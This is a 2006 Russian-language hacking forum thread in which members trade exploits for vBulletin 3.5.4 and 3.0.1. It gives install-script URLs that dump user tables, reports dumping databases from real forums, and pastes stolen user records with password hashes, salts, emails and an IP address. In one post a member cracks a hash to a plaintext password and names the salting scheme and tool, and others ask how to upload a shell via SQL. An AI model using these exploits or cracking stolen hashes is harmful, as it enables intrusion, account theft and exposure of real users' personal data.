PDA

Просмотр полной версии : vBulletin 3.5.4


Elenberg
06.07.2006, 15:38
Прошарил гугл вдоль и поперек
и не нашол ни какой уязвимости vBulletin Version 3.5.4
неужели это почти идеальный форум? :confused:

Просьба отписать про найденые уязвимости в этой теме :)

Utochka
06.07.2006, 15:49
версия новая, публичных багов нет.

Tem
06.07.2006, 15:56
Кто это сказал КСС есть.

Utochka
06.07.2006, 16:44
Кто это сказал КСС есть.

ну разве только Xss

Elenberg
06.07.2006, 16:56
если пока кроме xss нечиго не нашли это не означает что ничего нет

А нужно поискать потому что уже много где используют :p

Elenberg
06.07.2006, 22:28
а можно как то зделать такоеже

_http://forum.orgius.ru/profile.php?mode=viewprofile&u=37

на vBulletin Version 3.5.4 :D

Utochka
07.07.2006, 17:09
VBulletin 3.5.4 Exploit:
www.vicitimsite.com/forumpath/install/upgrade_301.php?step=

Видео:

http://rapidshare.de/files/25032471/vbulletinhackby_www.pldsoft.com.rar.html

LordNet
07.07.2006, 17:47
Не могу понять как в VBulletin 3.5.4 хеши пробрутить.
В VBulletin 3.5.4 соль есть?

max_pain89
07.07.2006, 18:03
Не могу понять как в VBulletin 3.5.4 хеши пробрутить.
В VBulletin 3.5.4 соль есть?
есть

ЗЫ ждем 3,6,0 вот там баги искать и будем

LordNet
07.07.2006, 18:05
2 max_pain89
Скажи плз в краций где что взять что бы хешь про брутить.

SanyaX
07.07.2006, 18:25
VBulletin 3.5.4 Exploit:
www.vicitimsite.com/forumpath/install/upgrade_301.php?step=

Видео:

http://rapidshare.de/files/25032471/vbulletinhackby_www.pldsoft.com.rar.html
Вижу только проснулся. баг давно был уже. Но в паблике не видел не где.

Elenberg
08.07.2006, 02:36
про этот баг знли наверно уже давно потому что почти ни где не работает. :(
Может ище что-то есть? ;)
Подкидывайте не стисняйтесь, посмотрим, оценим. :d

CCHQ
08.07.2006, 21:13
Зделал всё как тут Видео:

http://rapidshare.de/files/25032471/vbulletinhackby_www.pldsoft.com.rar.html
а вот как брутит непонал в какой форме прочетал про соль и хеш но недаганаю

Tem
08.07.2006, 21:45
Проверил 30 мин по гуглу, из 10 форумов, 8 форумов думп сделал.

Dark Angel
09.07.2006, 05:19
блин а я два часа просидел за ним и у меня всё время вотета песня вылетала!!!
-http://img66.imageshack.us/img66/4172/vb5ul.gif просит номер ползевателя или чтота такое!!как от етого избавится???

SanyaX
09.07.2006, 07:54
Бага уже не актуально. Можно забыть про неё она старая.

Dark Angel
10.07.2006, 01:26
а ну тогда понятна!!

MegaZLO
10.07.2006, 11:56
даите плиз ссылочку на видео, на рапиде уже удалено =(
в ллокале юзаю 3,5,4 нехоца чтобы попортили =))

CaH9
12.07.2006, 14:22
скиньте на мыло видео плиз

karayl@mail.ru

CCHQ
13.07.2006, 14:07
Ребата как брутит хеш в пасвордпро мд5 сол пасс мд5 иле в Sql иле мд5
илижы какоита другой подзкажыте

bul.666
13.07.2006, 14:16
Тебе нужен сам принцип работы брутера хешей?

CCHQ
14.07.2006, 01:07
не мне нада знать как их брутить хешы каторае я вытасчил

j0nathan
14.07.2006, 05:57
Всмысле? Тебе его разшифровать нужно или что ??

CCHQ
14.07.2006, 07:25
не рашыфровывыть мне ненада ничиво проста абеснити как вы делаите рашыффровку
хешей из vBulletin 3.0,1

Inferno
14.07.2006, 10:23
Последний вариант в пасвор про.

j0nathan
14.07.2006, 11:59
Ну для этого есть программа каторая разшифровывает мд5 хэши можно взять её на нсд.ру но тебе нужны будут наверно словарики лучше тут оставь разшифруем

CCHQ
14.07.2006, 17:33
А где можна словарики взать а то я был на пару саитав 250 мв есть
e192610a0a6ff7c25a7f72d16b8d7eb4
2679ad8de076ef788411668df644e760
4fad102e4a316c11b8b1cf0a3dee71c5
4021fff15e077374f2064bc9bc34e93f
6641df675efd4492e269509ce2731343
be08d81af9f37f44e508565af7a220c0


>> лучше тут оставь разшифруем

Для этого есть подраздел, а здесь не надо.

TANZWUT
14.07.2006, 17:51
если я неошибаюсь то в булке хэши солёные (ес енеправ - поправьте), качай с инсайдпро последнюю версию проги, в гугл посылать тебя неохота, но придёца - за словариками.. а дальше барабан в руки и т.д.

Loading
18.07.2006, 23:53
Э-э-э а видео уже нет на рапиде, вышли на мыло пожалуйста goodbdb@list.ru

LoneWolf666
24.07.2006, 14:05
НАРОД. Бага с виктимсайт НЕ РАБОТАЕТ ТЕПЕРЬ на форумах 3.5.4.
И чё там в видео смотреть? Надо быть лолегом чтобы НЕ СМОЧЬ заюзать этот баг...
Тонкий намёк... пробуйте форумы 3.0.1 . Гыгыгыгыгыг.
Думаете что такой галимый баг не работает на сурьёзных форумаъх? Ничего подобного. Я очень много баз сдампил... две из них - с больших муз. порталов по 6 с лишним тыс. юзверей. И, внимание, одна на 30 тыс юзверей.


Гуглите и вам воздастся. (с) NaZg
Запрос - Powered by

Loading
26.07.2006, 00:20
У меня есть база но где там соль незнаю подскажите.

Elenberg
01.08.2006, 20:49
Всем привет помнится ктото писал в теме что типа ждем версии 3.6.0 Beta 2 :D

Ну так вот хочу обрадывать такая версия уже сущиствует и много форумов уже проапдейтились.
прозьба вот какая нужно солёные хешики декодирывать подскажыте как плизз. :confused:

Ну и если ктото знает дырочки в новой версии то не стисняемся пишем. :rolleyes:

P.S. заранее благодарен за помощь.

em00s7
01.08.2006, 20:50
Loading кинь строчку из базы полностью....

em00s7
01.08.2006, 20:51
Elenberg кидай свой хеш и соль....

Elenberg
01.08.2006, 21:22
e7118f5d30a18f228b5992fac65d388c
f3515e5777438876e07a5b83eddb5d16
a самой соли у мну нет :(

em00s7
01.08.2006, 21:24
Elenberg без соли не как... кинь строчку из базы полностью и тебе покажу где соль....

Elenberg
01.08.2006, 21:33
INSERT INTO user VALUES(\'2\',\'6\',\'10\',\'0\',\'alec\',\'f3515e5 777438876e07a5b83eddb5d16\',\'2006-07-28\',\'alec@mv.ru\',\'0\',\'\',\'\',\'\',\'\',\'\' ,\'0\',\'Просто удав\',\'1\',\'1107345600\',\'0\',\'1154443769 \',\'1154446334\',\'1153872240\',\'392\',\'13\',\' 5\',\'3\',\'0\',\'0\',\'0\',\'2774\',\'\',\'0000-00-00\',\'40\',\'2\',\'213.242.62.45\',\'0\',\'0\',\' \',\'0\',\'0\',\'-1\',\'20\',\'0\',\'^iq\',\'0\',\'0\',\'\',\'\',\'0 \',\'315765\',\'0\',\'0\',\'0\',\'0\',\'\');

ЗАРАНИЕ СПАСИБО

Loading
01.08.2006, 22:48
\"6\"|\"2\"|\"\"|\"0\"|\"TESTer\"|\"71bed998afe731fc280a130711e21fdd\"|\"2006-07-05\"|\"lox@lox.ru\"|\"0\"|\"\"|\"\"|\"\"|\"\"|\"\"|\"\"|\"\"|\"1\"|\"0\"|\"<font color=\\\"red\\\"><b><i>Главный Тестер</i></b></font>\"|\"1\"|\"1152098100\"|\"-1\"|\"1152737583\"|\"1152737583\"|\"1152105471\"|\"0\"|\"20\"|\"5\"|\"0\"|\"0\"|\"0\"|\"0\"|\"0\"|\"3159\"|\"\"|\"0000-00-00\"|\"-1\"|\"-1\"|\"\"|\"0\"|\"0\"|\"0\"|\"2\"|\"-1\"|\"0\"|\"0\"|\"U0j\"|\"0\"|\"0\"|\"0\"

Вот строчка из базы.

limpompo
02.08.2006, 13:21
=> Loading

==========
hash - 71bed998afe731fc280a130711e21fdd
salt - U0j
==========

KruGoZor
19.11.2006, 16:33
Ребяты я лама у меня почему то грузитья фаил upgrade_300b3.php
после нажатия на кнопку дамп базы.
обьясните чё я не так делаю??(((
заранее благодарен

CtHuLhU
19.11.2006, 19:13
for KruGoZor

всё так. и от скрипта не зависит.
как сплойт проще заюзать
/install/upgradecore.php?do=sqltable&table=user&step[]
где user - предполагаемое имя таблицы с хэшами юзверей

KruGoZor
19.11.2006, 19:56
круто спасибо!!!
с меня +))

KruGoZor
19.11.2006, 20:11
INSERT INTO user VALUES('1','6','','0','LORD ALUCARD','a7e65433b82e964d3c0c0719115b63f8','2006-07-23','','0','','','','','','','','2','1','Древ ее Зло','1','1153657920','0','1163931713','1163949 280','1163931841','40','10','5','3','0','0','0','0 ','2135','07-14-1988','1988-07-14','-1','1','','0','0','0','0','-1','21','0','sab');


плииз поможите ещё сгенерить пароль...или скажите как по шагам)))
где соль я тоже не могу найти (sab чтоли??)

CtHuLhU
20.11.2006, 21:22
хэш: a7e65433b82e964d3c0c0719115b63f8
соль: sab
метод шифрования: md5(md5($pass).$salt) [PHP]

пароль: 253839
=)))

юзал PasswordPro 2.2.1.2

И.Г.
21.11.2006, 21:22
Что то никто ничего толком не предложил... Exploit наверно нет... XSS я думаю все нашли... но это гимморойно....

Mr_Necromancer
22.11.2006, 08:48
Хэш брутить мона прогой PasswordPro, но если пароль не дико простой, то на это у тебя уйдёт пару десятков лет :)

cardons
22.11.2006, 14:40
А кто нибудь знает как заливать шел,через Sql запрос?

И.Г.
22.11.2006, 21:31
А кто нибудь знает как заливать шел,через Sql запрос?

чуть конкретней....